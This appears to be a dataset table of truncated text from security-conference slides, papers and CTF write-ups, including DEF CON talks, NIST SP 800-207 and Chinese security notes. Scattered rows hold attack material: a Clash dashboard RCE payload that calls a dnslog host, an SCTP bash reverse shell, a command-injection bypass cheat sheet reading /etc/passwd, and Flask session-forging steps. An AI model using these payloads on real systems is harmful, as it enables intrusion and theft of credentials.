text stringlengths 100 9.93M | category stringclasses 11
values |
|---|---|
FORENSIC FAILS
SHIFT + DELETE WON’T HELP YOU HERE
ERIC ROBI + MICHAEL PERKLIN
DEFCON 21
AUGUST 4, 2013
ABOUT THIS GUY
ERIC ROBI
Founder of Elluma Discovery - 11 years
Forensic Examiner
Thousands of exams
Expert Witness
Likes Cats
ABOUT THIS OTHER GUY
MICHAEL PERKLIN
Senior Investigator / Forensic Examiner
Securit... | pdf |
Keren Elazari
aka @K3r3n3
www.K3r3n3.com
@K3r3n3
TAKE THE RED PILL?
Source : “25 Years Of Vulnerabilities: 1988-2012 Sourcefire Research Report”
Solution: Secure What Matters!
Life
Rights
CritInfr
IP
PII
CCN
Counter-
measures
Situational
Awareness
Operational
Excellence
Defensible
Infrastructure... | pdf |
>>> Picking Bluetooth Low Energy
Locks from a Quarter Mile Away
Anthony Rose & Ben Ramsey
[1/42]
>>> whoami
[2/42]
* Anthony Rose
- Researcher,
Merculite Security
- Lockpicking hobbyist
- BS in Electrical
Engineering
- Prior work:
Wireless video
traffic analysis
- Currently focused on
BLE security
* Ben Ramsey
- Resear... | pdf |
Push
The
Stack
Consulting
http://pushthestack.com
Security When
Nanoseconds Count
a
whitepaper
on
the
security
issues
and
challenges
with
next
generation
finance
and
trading
infrastructures
Blackhat
USA
Briefings
2011
Abstract
There's
a
brave
new... | pdf |
道高一尺,牆高一丈:東亞
網絡封鎖和反封鎖技術演進
介紹
蕭強
加大柏克萊分校逆權力實驗室
第一封電子郵件 (1987) :
https://bit.ly/2NsTe2Q
“Across the Great Wall we can reach every
corner in the world”
中大國九互聯網關
https://bit.ly/2NsTe2Q
國家公共網絡監控系統俗稱中國網絡防火牆
(The Great Fire Wall of China,常用簡稱「GFW」
或「牆」)。
網絡封鎖的歷史背景 (1999)
• 國家信息化工作領導小組
• 組長: 吳邦國
GFW 成立的背景
https://bit.ly/2uOp7... | pdf |
Samsung
Pay:
Tokenized
Numbers,
Flaws and Issues
Salvador Mendoza
July 7, 2016
Introduction
Samsung Pay is a new method to make purchases over the latest line of Samsung
smartphones devices. The goal is to implement mst technology mainly in every purchase.
However, Samsung Pay could use nfc technology as well. Sams... | pdf |
1
clash dashboard rce
利⽤限制:
jj.yaml
payload:
Bash
复制代码
1.配置中external-controller监听0.0.0.0(很多订阅地址默认配置即为0.0.0.0)
2.linux环境
3.命令执⾏需管理员登录服务器才会触发
1
2
3
Bash
复制代码
id>/tmp/1.txt:
test
whoami:
curl clash.jj.dnslog.cn
proxies:
-
name: 'jjproxy'
type: ssr
server: jjproxy.com
port: 0
cipher:... | pdf |
Slide: 1
Meta-Post Exploitation
Val Smith (Valsmith@offensivecomputing.net)
Colin Ames (amesc@offensivecomputing.net)
Using Old, Lost, Forgotten Knowledge
Slide: 2
Valsmith
– Affiliations:
• Offensive Computing
• Metasploit
• cDc
– Work:
• Malware Analyst
• Reverse Engineer
• Penetration Tester
• Exploit developer
Slid... | pdf |
Trends in Licensing of
Security Tools
Chuck Willis
DefCon 13
July 2005
Most recent slides available at:
http://www.securityfoundry.com/
Purpose
● Discuss license trends and how they
affect the security community
● Discuss how licensing can be improved (if
necessary)
● Educate security tool users about license
requ... | pdf |
What is wrong with security?
What is wrong with security?
• Good security says you shouldn’t make
assumptions.
• Most security products make this same
mistake.
• This should be called Voodoo security…
IDS/IPS
• They analyze traffic.
• They determine good traffic from bad traffic
– With signatures written based on a
... | pdf |
Evil eBPF
Practical Abuses of an In-Kernel Bytecode Runtime
Jeff Dileo
DEF CON 27
call_usermodehelper("/bin/sh",(char*[]){"/bin/sh","-c","whoami",NULL},NULL,5)
• @chaosdatumz
• Agent of chaos
• Unix aficionado
• Principal Consultant / Research Director @ NCC Group
• I like to do terrible things to/with/in:
• programs
•... | pdf |
NIST Special Publication 800-207
Zero Trust Architecture
Scott Rose
Oliver Borchert
Stu Mitchell
Sean Connelly
This publication is available free of charge from:
https://doi.org/10.6028/NIST.SP.800-207
C O M P U T E R S E C U R I T Y
NIST Special Publication 800-207
Zero Trust Architecture
... | pdf |
PropLANE!!
Kind!of!keeping!the!NSA!from!
watching!you!pee!
Introduc9on!
• The!guys!up!here!
– Mark!Carey!(phorkus)!
– Russ!Rogers!(russr)!
– Ryan!Clarke!(L0stboy)!
– Rob!Bathurst!(evilrob)!
• Guys!not!up!here!
– You!
History!of!Crypto!Part!I!
• Scytale!
• Caesar!Cipher!
• One!Time!Pad!(OTP)!
• Enigma!Machine!
• ... | pdf |
Orange Tsai
Orange Tsai
DEVCORE 安全研究員
2014 ~ 2017
2017 ~ Now
2008 ~ 2014
2014 ~ 2017
2017 ~ Now
2008 ~ 2014
2014 ~ 2017
2017 ~ Now
2008 ~ 2014
- WAF?
• X-www-form-urlencode
• Multipart/form-data
• Chunked
?
return read_file(resolve(root, path))
?
var UP_PATH_REGEXP = /(?:^|[\\/])\.\.(?:[\\/]|$)/
if (pathIsAbsolut... | pdf |
Hadoop:
Apache’s Open Source
Implementation of Google’s
MapReduce Framework
Hacked Existence Team
Joey Calca & Ryan Anguiano
http://hackedexistence.com
Cloud Computing
• Clouds are big piles of other people’s
machines, plus virtualization
• Remote
• Scalable
• Virtual
• High Level API
• Course Grain data processed ... | pdf |
Stagefright: Scary Code
in the Heart of Android
Researching Android Multimedia
Framework Security
Joshua "jduck" Drake
August 7th 2015
DEF CON 23
Agenda
Introduction
System Architecture
Attack Surface
Attack Vectors
Vulnerability Discovery / Issues Found
Exploitability / Mitigations
Disclosure
Conclusions
Introduction
... | pdf |
© 2005, Independent Security Evaluators
www.securityevaluators.com
How Smart is Intelligent Fuzzing -
or - How Stupid is Dumb Fuzzing?
Charles Miller
Independent Security Evaluators
August 3, 2007
cmiller@securityevaluators.com
© 2005, Independent Security Evaluators
www.securityevaluators.com
Agenda
▪ Introduction
... | pdf |
普通人的GPT免费交流社群
在社群中你会获得:
•
定期分享国内可直接免费使用的ChatGPT镜像网址
•
最适合你的ChatGPT、MidJourney使用教程及的高阶玩法
•
AI人工智能、ChatGPT、AIGC等最新研报(超过100份)和相关资讯
•
不定期分享ChatGPT变现案例
•
和各路大神畅聊Al、不定期邀请行业大咖演讲互动交流学习
关注公众号
加入交流群 | pdf |
Social
Networking
Special
Ops:
Extending
data
visualization
tools
for
faster
pwnage
Chris
Sumner
@TheSuggmeister
www.securityg33k.com
Latest Document
The latest revision of this paper will be available at http://www.securityg33k.com/wp/BH10.pdf after the
conference.
This is revision r1.2
Disclaimer
I am not ... | pdf |
通过将keytab导入wireshark中实现对
Kerberos协议加密部分进行直接解包
本文主要记录了如何通过一些列操作,将生成的keytab导入wireshark,实现可以在wireshark中直
接对Kerberos协议加密部分进行解密的一个过程,避免大家踩坑。
keytab是可以理解为一个密钥表,是key table的缩写,用途类似于用户的密码,keytab中包含一个
或多个条目,每个条目包含一个条目创建时的时间戳,主体名,密钥版本号,加密类型以及密钥本身。
具体关于keytab的信息可以上MIT的Kerberos实现网站上具体查看,这里只大概介绍。
具体操作过程如下:
1.在域控中复制出一... | pdf |
营销活动和反作弊
01
业务概述
•
业务形式
裂变/签到/抽奖/走路等
•
风险类型
黑产/自然人/众包等
三方“博弈”
业务概述
反作弊和业务
•
营销反作弊是信任品
•
业务需求第一,事前明确边界
•
我的地盘我做主,重视规则设计
•
知己知彼,不过度承诺
业务概述
•
黑产很精明
收益率高,钞票多多
•
黑产很聪明
对抗是什么,本质是反馈系统
如何干扰攻击者的反馈系统?
查杀分离
延迟/混淆处置
攻击者如何干扰我们的反馈系统?
模拟行为,以假乱真?
... | pdf |
Biting the Hand that Feeds You
Storing and Serving Malicious Content from Popular Web Servers
Billy K Rios (BK) and Nate McFeters
Agenda
Domain Names and Trust
• Who do you Trust?
• Biting the Hand - Yahoo
• Biting the Hand - Gmail
• Flash Based Attacks
• URI Use and Abuse
• Questions / Conclusions
Who do you Trust?
... | pdf |
Widdershins: The Hacker
Nation
Simple Nomad
DefCon X - 2002
About Me/This Talk
NMRC
BindView
Skills Needed
NMRC
BindView
Skills Needed
NMRC
BindView
Skills Needed
The Year In Review
DMCA muscle is flexed.
Terrorism.
Legislation clarifies various portions of previous
laws.
More knee-jerk legislation on the way.
The Pr... | pdf |
WP
use https://github.com/noraj/flask-session-cookie-manager
import os
import string
a=string.digits+string.ascii_letters
for i in range(0,len(a)):
name='python3 ense.py encode -s "KEY_SECRET_PWN_HUB" -t "
{\'username\':\'Ne'+a[i]+'\'}"'
os.system(name)
output:
eyJ1c2VybmFtZSI6Ik5lMCJ9.XbpKQQ.Eq9AjAwo7K2lmbRR1k7... | pdf |
安全软件开发生命周期(S SDLC)
安全软件开发生命周期(S-SDLC)
与业务安全
与业务安全
自我介绍&培训
高级讲师 包悦忠
• CWASP高级讲师:包悦忠
• 专场培训
1) 北京市朝阳区北四环中路8号 五洲皇冠国际酒店 会议室8
1) 北京市朝阳区北四环中路8号 五洲皇冠国际酒店 会议室8
2) 高级会员免费参与
软件安全保障
(软件安全
• Software Security Assurance (软件安全
保障) is the process (流程) of ensuring that
)
p
(
)
g
software is designed (设计) to operate at a
level of sec... | pdf |
先放上一个图示 方便理解
然后放上目录结构
1
├─application 应用目录(可设置)
2
│ ├─common 公共模块目录(可更改)
3
│ ├─index 模块目录(可更改)
4
│ │ ├─config.php 模块配置文件
5
│ │ ├─common.php 模块函数文件
6
│ │ ├─controller 控制器目录
7
│ │ ├─model 模型目录
8
│ │ ├─view 视图目录
9
│ │ └─ ... 更多类库目录
10
│ ├─command.php 命令行工具配置文件
11
│ ├─common.php 应用公共(函数)文件
12
│ ├─config.php 应用(公共)配置文件
13
│... | pdf |
云@金山 Cloud at KINGSOFT
--一种不同的思路做云安全
A different thought in cloud-based security
演讲人: CardMagic (孙明焱)
金山网络 KINGSOFT
Agenda
金山云体系
KINGSOFT cloud artitecture
金山云防御
KINGSOFT cloud defense
金山云查杀
KINGSOFT cloud-based anti-virus
关于演讲者 About the speaker…
孙明焱 ID: CardMagic
-现任金山网络产品总监,负责金山毒霸相关开发
current product director ... | pdf |
Assisted Discovery of On-Chip Debug Interfaces
Joe Grand, Grand Idea Studio, Inc.
www.jtagulator.com
Introduction
•
On-chip debug interfaces (such as JTAG)
are a well-known hardware attack vector
-
Extract program code or data
-
Modify memory contents
-
Affect device operation on-the-fly
-
Provide chip-level control o... | pdf |
Virtunoid: Breaking out of KVM
Nelson Elhage
July 25, 2011
Nelson Elhage ()
Virtunoid: Breaking out of KVM
July 25, 2011
1 / 42
Outline
1
KVM: Architecture overview
Attack Surface
2
CVE-2011-1751: The bug
3
virtunoid.c: The exploit
%rip control
Getting to shellcode
Bypassing ASLR
4
Conclusions and further research
5
De... | pdf |
apt install lksctp-tools
modprobe sctp
lsmod | grep sctp
checksctp
run SCTP server in one terminal,
sctp_darn -H 0 -P 2500 -l
sctpshell
0x00
0x01
run SCTP client in another terminal,
sctp_darn -H 0 -P 2600 -h 127.0.0.1 -p 2500 -s
0x02
sudo apt-get install ksh
/bin/bash -i > /dev/sctp/host/port 2>&1... | pdf |
Satellite Imagery Analysis
Greg Conti
gjconti@rumint.org
image: nasa.gov
The views expressed in this presentation are those
of the author and do not reflect the official policy
or position of the United States Military Academy,
the Department of the Army, the Department of
Defense or the U.S. Government.
http://ehp... | pdf |
Total Endpoint Protection: #1 in EDR & Next-Gen AV
No Win32_Process Needed
Expanding The WMI Lateral
Movement Arsenal
Total Endpoint Protection: #1 in EDR & Next-Gen AV
About Me
o Security researcher – Cybereason
o @PhilipTsukerman
o Probably really stressed out right now
Total Endpoint Protection: #1 in EDR & Next-Ge... | pdf |
Insecure.Org
Insecure.Org
Mastering the Nmap Scripting Engine
by Fyodor and David Fifield
http://insecure.org/presentations/BHDC10/
Black Hat Briefings Las Vegas
July 28; 4:45 PM; Augustus 5+6
Defcon 18
July 30; 5:00 PM; Track One
Insecure.Org
Insecure.Org
Abstract
Most hackers can use Nmap for simple port scanning and... | pdf |
macOS/iOS Kernel Debugging and Heap Feng Shui
Min(Spark) Zheng @ Alibaba Mobile Security
Outline
Alibaba Security
• Introduction
• macOS Two Machine Debugging
• iOS Kernel Debugging
• Debugging Mach_voucher Heap Overflow
• Traditional Heap Feng Shui
• Port Feng Shui
• Conclusion
Whoami
•
SparkZheng @ Twitter,蒸米spark @ ... | pdf |
Java安全之Dubbo反序列化漏洞分析
0x00 前言
最近天气冷,懒癌又犯了,加上各种项目使得本篇文断断续续。
0x01 Dubbo
概述
Dubbo是阿里巴巴开源的基于 Java 的高性能 RPC(一种远程调用) 分布式服务框架(SOA),致力于
提供高性能和透明化的RPC远程服务调用方案,以及SOA服务治理方案。dubbo 支持多种序列化方式并
且序列化是和协议相对应的。比如:Dubbo支持dubbo、rmi、hessian、http、webservice、thrift、
redis等多种协议。
运行机制
Dubbo框架启动,容器Container一启动,服务提供者Provider会将提供的服务信息注册到注册中心
Regi... | pdf |
Hacking the Mind:
NLP and Influence
by Mystic
Goals for Talk
Introduction to NLP
Tools for using NLP to influence
Gaining rapport
Motivation strategies
Submodalities
Milton Model
What is NLP?
Neuro-Linguistic Programming
Neuro: Our neurology and our five senses
Linguistic: The language we use to
describe our word and com... | pdf |
//
`id`
$(id)
\nid
idwhoami
id&&whoami
id||whoami
//
{ls,-l}
ls\t-l
$(printf "\154\163")
l''s''
l""s
l``s
l\s
ls$u
cat /???/pass*
cat /etc$u/passwd
cat /etc/pass{wd,}
a=c;b=a;c=t;
$a$b$c 1.txt
//base64
echo 'cat' | base64
`echo 'Y2F0wqAK' | base64 -d` 1.txt
//base64cat /etc/passwd
echo 'Y2F0IC9ldGMvcGFzc3dk' | base64 -... | pdf |
node_to_clusteradmin-如何从Kubernetes节点权限提升⾄集群管理员权限.md
5/23/2022
1 / 8
如何从 Kubernetes 节点权限提升⾄集群管理员权限?
我有幸参加了去年的 KubeCon 并分享议题,议题的其中⼀个攻防案例讲述了如何从⼀个边缘业务的开发者权
限逐步提升⾄ Kubernetes 集群管理员权限;其中最后⼀步的⼿法,是描述关于节点上利⽤ DaemonSet 和
Pod 上的 ServiceAccount token 进⾏提权,那⼀年我在补天上的议题也简述了这个⼿法。在今年的 KubeCon
欧洲上,这样的攻击⼿法被命名为了"蹦床"。快速过完国外的这篇 slide 之后,深感他... | pdf |
EMET 4.0 PKI MITIGATION
Neil Sikka
DefCon 21
ABOUT ME
• Security Engineer on MSRC (Microsoft Security Response Center)
• I look at 0Days
• EMET Developer
• I enjoy doing security research on my free time too:
http://neilscomputerblog.blogspot.com/
• Twitter:
@neilsikka
OVERVIEW
1.
What Is EMET?
2.
New Features in EMET ... | pdf |
Cyberterrorism & the Security of the
National Drinking Water Infrastructure
John McNabb
johnmcnabb@comcast.net
DEF CON 18
July 31, 2010
1
Introduction
• IT Pro, 5 years; have a few certs….
• Water Commissioner, 13 years, 1997-2010
• Mass. DEP 6 years, 1983-1986, Legislative Liaison
• Clean Water Action, 10 y... | pdf |
***
Check out http://fort.ninja/defcon24
for the latest version of this information
***
@evanbooth
Shotgun
Of
RANDOM
™
http://fort.ninja/defcon24#shotgun
Finding Potential
throughout history…
George
Washington
Carver
Foods
Salted Peanuts
Peanut Butter, regular (3)
Breakfast Food #1
Butter from Peanut Milk
Br... | pdf |
Devil&is&in&the&Details:&Revealing&How&
Linux&Kernel&put_user at&Risk
Edward&Lo&and&Chiachih Wu
C0RE&Team
About&Us
• 羅元琮 (Edward)
– 奇虎 360&安全研究開發工程師
– 專職內核漏洞挖掘與利用
– “360&超級 ROOT”&技術負責人
• 吳家志 (@chiachih_wu)
– 奇虎 360&安全研究開發工程師
– Android/Linux 系統安全研究
– C0RE&Team&(c0reteam.org)&創始成員
CVE-2013-2094&(perf_swevent_init)
CVE-20... | pdf |
Beyond Root
Custom Firmware For Embedded Mobile
Chipsets
Biography
Christopher Wade
Security Consultant at Pen Test Partners
@Iskuri1
https://github.com/Iskuri
https://www.pentestpartners.com
Project Origin
Smartphones contain a huge amount of closed firmware
This limits the capabilities of even rooted devices
By brea... | pdf |
- 2 -
u Dongsung Kim
u Graduate Student, Sungkyunkwan University
u @kid1ng / https://kidi.ng
u Hyoung-Kee Choi
u Professor, Sungkyunkwan University
u https://hit.skku.edu/~hkchoi
- 3 -
u Motivation
u Tizen Security Internals
u Dan the D-Bus Analyzer
u Privilege Violations
u Conclusion
1
- 5 -
u Samsung’s smartwatch pro... | pdf |
Jeremy Chiu,
Lead Security Researcher, X‐Solve Lab
Armorize Technologies
2007‐07‐21
Prefix
由於近日惡意網頁的問題頻傳,讓駭客利用惡意程式大量
入侵,造成了許多政府機關及各企業的機密資料外洩等資
安問題。
為了對抗惡意網頁及伴隨而來的網路犯罪問題,今年阿碼
科技公司的艾克索夫實驗室研究團隊特別企劃了一個研究
計畫,針對了台灣區網站進行大規模資安檢測。對於現階
段的惡意網站問題與惡意程式掛馬兩大部分進行研究,在
這個報告中將對於植入的技術與惡意程式做深入的技術分
析,活生生的內容,讓您了解目前台灣區的各機關與公司
網站被入侵現況。
Taiwan... | pdf |
Research
Demystifying Kernel Exploitation by
Abusing GDI Objects
Saif El-Sherei
saif@sensepost.com
!
Demystifying Kernel Exploitation by
Abusing GDI Objects 2017-07-18!
!
! !
!
pg.!2!
!
Introduction
In this paper, we will discuss integer overflows that lead to Kernel Pool memory corruption. We will
go through d... | pdf |
Who’s&this…&guy&
• 10&years&on&the&defensive&side&
• File&analysis&&&RE&
• Recently&doing&research&using&machine&
learning&
Level&Se?ng&
• ROP&
• Technique&to&bypass&nonFexecutable&memory&
• Bounce&around&in&memory&execuIng&small&
gadgets&that&typically&end&with&a&return&
instrucIon&
• PIN&
• Pin&is&a&dynamic&binary&in... | pdf |
Exploiting JRE
- JRE Vulnerability: Analysis & Hunting
@Hitcon 2013
xye0x01@gmail.com
nforest@live.cn
About Us
• Xiao Lee(xye0x01),Sen Nie(nforest)
• SHANGHAI JIAO TONG UNIVERSITY
• Major in Computer Science and
Technology
• J2EE Development/Program Analysis/
JRE Vulnerability Research/XSS
Abstract
•Exploiting Applet... | pdf |
CommonCollection1
InvokeTransformer
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//
package org.apache.commons.collections.functors;
import java.io.Serializable;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import org.apach... | pdf |
Who
am
I?
• 11
years
in
InfoSec
with
5
years
of
hobby
work
prior
to
that
• Primary
interests:
penetra;on
tes;ng,
intrusion
detec;on,
and
log
correla;on
• Currently
employed
as
an
InfoSec
generalist
at
a
cloud
provider
• Previ... | pdf |
Nathan
Hamiel
Principal
Consultant
Associate
Professor
at
UAT
Marcin
Wielgoszewski
Security
Engineer
• Reliance
on
tools
can
=
Fail!
– Many
more
people
tes4ng
web
apps
– Vendors
play
catch-‐up
– Success
is
on
your
shoulders
• Difficult
ca... | pdf |
Re-establishing Trust in Compromised Systems:
Recovering from Rootkits that Trojan the
System Call Table
Julian B. Grizzard, John G. Levine, and Henry L. Owen
{grizzard, levine, owen}@ece.gatech.edu
School of Electrical and Computer Engineering
Georgia Institute of Technology
Atlanta, Georgia 30332–0250, USA
Abstract. ... | pdf |
陆柏廷 | BT
漏洞盒子 高级安全研究员
漏洞盒子简介
漏洞盒子
互联网安全服
务平台
FreeBuf
互联网安全新
媒体
网藤风险感知
基于SaaS模式的自
动化企业安全风险
感知服务平台
自有安全团队与外部
安全专家结合,共同
为厂商提供安全一体
化解决方案
安全专家
相关机构
厂商
厂商:金融、保险、电商、互联网、通信等
相关机构:CNCERT、CNNVD、 SERCIS、
SHCERT、公安部第三研究所、中国民航测评中心、
天津网安等
演讲提纲
前
言
场
景
方
法
企业安全测试进化史
1.0
2.0
3.0
基于功能/
性能的”安
全测试”
基于漏洞类
型的安全测
试
基于业务场
景的安全测
试
何为业务场景
... | pdf |
Copyright © 2010 Trustwave. All Rights Reserved.
A Whitepaper for DEF CON 18, July, 2010
This is not the droid you're looking for...
Christian Papathanasiou
Nicholas J. Percoco
June 21st, 2010
Trustwave
- 2 -
Copyright © 2010 Trustwave. All Rights Reserved.
A Whitepaper for DEF CON 18, July, 2010
Table of Con... | pdf |
DEF CON 101
THE PANEL
SUPER N00B KART
Welcome to Las Vegas
Pace yourself
THIS IS DEF CON
DGAF
Everyone was a n00b once.
All of us are still n00bs at
something.
THIS IS THE DESERT
Stay hydrated
All Good
Sit Down
And Drink
Grab A
Glass of
Water
Call A
Doctor
THE COUNTDOWN
Simple rules for
surviving... | pdf |
Bypass AMSI的前世今生(5) - 内存补丁
0x00 前言
内存补丁是目前bypass amsi最常用的技术之一。通过前几篇文章,我们已经知道AMSI检测相关API的调
用顺序:
我们还是以powershell为例,当我们打开powershell.exe,powershell.exe会加载
System.Management.Automation.dll,此dll会调用amsi.dll,因此我们只要分析清楚这2个dll里面的函
数调用和判断逻辑,就能在合适的地方修改判断逻辑,使得程序判断结果为我们指定的结果。
0x01 流程分析
我们先使用ILSpy反编译System.Management.Automation.dll,在... | pdf |
GPS SPOOFING
Low-cost GPS simulator
HUANG Lin, YANG Qing
Unicorn Team – Radio and Hardware Security Research
Qihoo 360 Technology Co. Ltd.
Who we are? Unicorn Team
• Qihoo360’s UnicornTeam consists of a group of
brilliant security researchers. We focus on the security
of anything that uses radio technologies, fr... | pdf |
网鼎杯-青龙组WP
Author:Nu1L
网鼎杯-青龙组WP
Web
AreUSerialz
trace
notes
filejava
Re
signal
joker
bang
Pwn
boom1
boom2
faster0
Misc
签到
Crypto
you raise me up
boom
Web
AreUSerialz
bypass即可:
str=O%3A11%3A"FileHandler"%3A2%3A%7Bs%3A2%3A"op"%3Bs%3A17%3A"2.00e%2B00000000
000"%3Bs%3A8%3A"filename"%3Bs%3A18%3A"%2Fweb%2Fhtml%2Fflag.php"%3B%7D... | pdf |
GTVHACKER
Google TV Or: How I Learned to Stop
Worrying and Exploit Secure Boot
GTVHACKER
GTVHacker: The Team
•
GTVHacker is a group of 6 hackers with
individual skill sets who work together to
unlock Google TV devices.
•
Our primary goal is to bypass hardware
and software restrictions to allow for
unsigned ke... | pdf |
顶级域攻击与接管指南
> ABOUT ME
0 1
•
ztz @360高级攻防实验室
•
专注攻防对抗研究、漏洞挖掘、武器开发
•
// Google Hall of Fame
•
// Golang
•
// Ruby
•
// Homebrew
> 主要内容
0 2
•
DNS Protocol 介绍
•
云 DNS 场景劫持探讨
•
顶级域 DNS 场景劫持探讨
> DNS 协议
0 3
•
诞生于 1983 年,不断更新到现在
•
实现主机与 IP 地址转化的“互联网电话簿”
•
ICANN 负责域名系统的维护和运作
> DNS 协议
0 4
> 域名组成
0 5
sub.domain.tld.
子域
权威域
顶... | pdf |
我这10年的“搞站”路
我叫老牛,是高中室友给起的,原因很简单,我在8人寝室年龄排第六,四川话“老6”和“老牛”读音相仿。
后来我就把我的qq昵称改成了“L.N.”,我接受了这个称呼,因为自我审视,性格的确有执拗的一面,内
向且不善言谈。我以“老牛”的称呼警醒自己,大学就去参加了很多社团和当了2年团支书,得到了不错的
改善。扯远了,说回来,“L.N.”是我踏上“搞站”路的第一个代号,中途换过几个,发现还是L.N.
更“像”我,就这样一直用到现在。
第一次知道破解别人QQ空间密码是可以学习的,也是在高中。于是迫不及待的学习了一些如今看来都是
违法乱纪的技术手段,最后qq空间密码没破解开,倒是认识了很多技术上的好朋友,大家一起开开心心
... | pdf |
Through the looking-glass,
and what Eve found there
http://www.s3.eurecom.fr/lg/
Luca 'kaeso' Bruno <lucab@debian.org>,
Mariano 'emdel' Graziano <graziano@eurecom.fr>
2
10/08/2014
About us
• S3 group at Eurecom (FR) - System security
– Embedded systems
– Networking devices
– Critical infrastructures
– Memory forensics ... | pdf |
智能合约安全开发
Ali0th
Email :martin2877@foxmail.com
智能合约安全开发
1. 相关概念
2. 安全事件
3. 审计之路
4. 常见漏洞
5. 常用工具
智能合约
智能合约(Smart Contract)是以太坊中最为重要的一个概念,即以计
算机程序的方式来缔结和运行各种合约。最早在上世纪 90 年代,Nick
Szabo 等人就提出过类似的概念,但一直依赖因为缺乏可靠执行智能合约的
环境,而被作为一种理论设计。区块链技术的出现,恰好补充了这一缺陷。
以太坊支持通过图灵完备的高级语言(包括 Solidity、Serpent、Viper)
等来开发智能合约。智能合约作为运行在以太坊虚拟机(Ethe... | pdf |
timeless attackpipeline
0x00
rce
blackhattimeless attack
timeless attacktimeless attack
0x01 timeless attack
blackhathttps://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Timeless-Timing-Attacks.pdf
TQLCTFwriteup
https://blog.zeddyu.info/2022/02/21/2022-02-21-PracticalTimingTimeless/
str = "hello"
for i in range(le... | pdf |
Building a Real Session Layer
D.J. Capelis
Defcon 16
Let's start at the beginning
It's easier to end at the end when you start at the beginning
What's a Session Layer?
ISO 7 Layer Model
(Designed by committee)
1 – Physical Layer
(e.g. Cat 6, Fiber, Air)
2 – Data Link Layer
(e.g. Ethernet, 802.11[abgns...], FDDI)
3 – Ne... | pdf |
8/20/14
Open Source and CSIRT
- What can we do?-
Presented by:
Yoshiki Sugiura, CSIRT Evangelist
Shin Adachi, CISSP, CISM, CISA, PMP
Congratulations HITCON on
your 10th Anniversary!
FIRST OF ALL
8/20/14
This presentation ONLY reflects
personal views and opinions of the
presenters, NOT presenters’ affiliations
... | pdf |
Attacks from a New Front Door
in 4G & 5G
mobile networks
Dr. Altaf Shaik & Shinjo Park
TU Berlin
& FastIoT
Blackhat USA 2022
Attacks so far in mobile networks
●
Radio access network – IMSI catchers, False base stations
●
Signaling interconnect – SS7, Diameter interfaces
●
SIM attacks – authentication, sim jacker
●
SM... | pdf |
1
ASP.NET下的内存⻢:Route内存⻢的N种写法
前⾔
System.Web.Routing
Route内存⻢
⾃⼰实现RouteBase
GetRouteData
GetVirtualPath
优先级
利⽤System.Web.Routing.Route
注⼊RouteHandler
注⼊HttpHandler
路由问题
添加到第⼀位
测试
参考
@yzddmr6
asp.net下的内存⻢研究⽂章⽐较少,⽬前提到过的包括虚拟路径内存⻢以及HttpListener内存⻢。最近
研究了⼀下其他类型的内存⻢,发现.net可以利⽤的地⽅要多得多。所以准备写个系列⽂章,讲⼀讲
asp.net下的内存⻢。
⽂章仅作研究性质,不保证... | pdf |
Media over Coaxial Alliance (MoCA): Operation
and Security Posture
Andrew Hunt
Volgeneau School of Engineering,George Mason University
Fairfax, VA
ahunt5@masonlive.gmu.edu
Abstract— Media over Coax Alliance (MoCA) is a protocol
specification to enable assured high-bandwidth connections for
the high demands of v... | pdf |
0xcsandker
csandker
RSS Feed
//Posts
//History of Windows
//Archive
//Tags & Search
//ME
Switch Theme
Offensive Windows IPC Internals 2: RPC
21 Feb 2021 (Last Updated: 19 5⽉ 2021)
>> The Series
>> Introduction
>> History
>> RPC Messaging
>> RPC Protocol Sequence
>> RPC Interfaces
>> RPC Binding
>> Anonymous & A... | pdf |
Frevbhfyl? Ntnva? Ebg guvegrra? Whfg jung qb lbh gnxr zr sbe?
QmFzZTY0PyBOb3cgeW91J3JlIGp1c3QgcmVhY2hpbmcuLi5UaGluZ3MgYX
JlIG9ubHkgZXZlciBhcyBjb21wbGljYXRlZCBhcyB0aGV5IG5lZWQgdG8gYmU
uICBCdXQgaWYgeW91IGdldCBzdHVjaywgd2hlbiB5b3UncmUgYmx1ZSwgd
HJ5IHR1cm5pbmcgdXAgdGhlIGhlYXQuICBJdCB3aWxsIG1ha2UgeW91IHRo
aW5rIHlvdSdyZSB... | pdf |
我是衬衫 忍者的弟弟 今天我去 TG 看片 发现了一个机器人 感觉很好玩 那我们也整一个
用来扫描吧!
首先 我们去买一个服务器 好的 1 分钟过去了 我们买完了
我们现在需要注册一个机器人
@BotFather TG 加他
起一个好听一点的名字就可以了
很快啊 我们就拿到了自己的 Token
https://core.telegram.org/bots/api 这个是 API 文档 可以随便看看
我建议大家先去看一次 python-telegram
那么开始吧
导包下
from telegram import Update,Bot
from telegram.ext import Updater, CommandHandler, ... | pdf |
2009 年駭客年會徵求論文
HIT 2009 Call For Paper
時間:2009 年 7 月 18 日~19 日(星期六~星期日)
主辦單位:CHROOT – Security Research Group (http://www.chroot.org)
TWISC – Taiwan Information Security Center (http://www.twisc.org)
活動網址:http://hitcon.org
台灣第五屆駭客年會將於 2009 年 7 月 18~19 日(週六、日)舉行,歡迎各
界人士踴躍投稿。論文內容以探討實作技術並能演講 5... | pdf |
IT Audit:
Security Beyond the Checklist
This paper is from the SANS IT Audit site. Reposting is not permited without express written permission.
Copyright SANS Institute
Author Retains Full Rights
Interested in learning more?
Check out the list of upcoming events offering
"IT Security Audit and Control Essentials (Audi... | pdf |
ProxyLogon
is Just the Tip of the Iceberg
A New Attack Surface on Microsoft Exchange Server!
Orange Tsai
USA 2021
Orange Tsai
• Orange Tsai, focusing on Web and Application 0-day research
• Principal Security Researcher of DEVCORE
• Captain of HITCON CTF Team
• Speaker of Security Conferences
• Black Hat USA & ASIA / D... | pdf |
DNSSECTION @ DEF CON 28 SAFE MODE
6 Aug 2020
1 / 40
DNSSECTION
Hadrien Barral
Rémi Géraud-Stewart
Amaury Barral
David Naccache
École normale supérieure @ PSL University / QPSI @ Qualcomm Technologies Inc.
What is this about
■ An e-mail privacy breach in the largest French cloud provider
■ The first practical attack ... | pdf |
Nu1L-ZCTF-Writeup
——By Nu1L 全员
部分脚本请见附件
Misc 类
Misc10-签到题
直接新浪微博搜下:
MISC100 xctf 竞赛规则
开始完全没思路,解压 word 得到的 document.xml 发现一堆烫然而并没有什
么思路,后来根据提示宽窄间距,想到是烫的间距,利用 python 的 xml 库写一
个小的脚本就可以得到一串 01,转化 ascii 就可以了。中间需要注意的是不能光
提取 xml 的间距,还需要乘上中间的烫的个数。
import xml.dom.minidom
import sys
reload(sys)
sys.setdefaultencodi... | pdf |
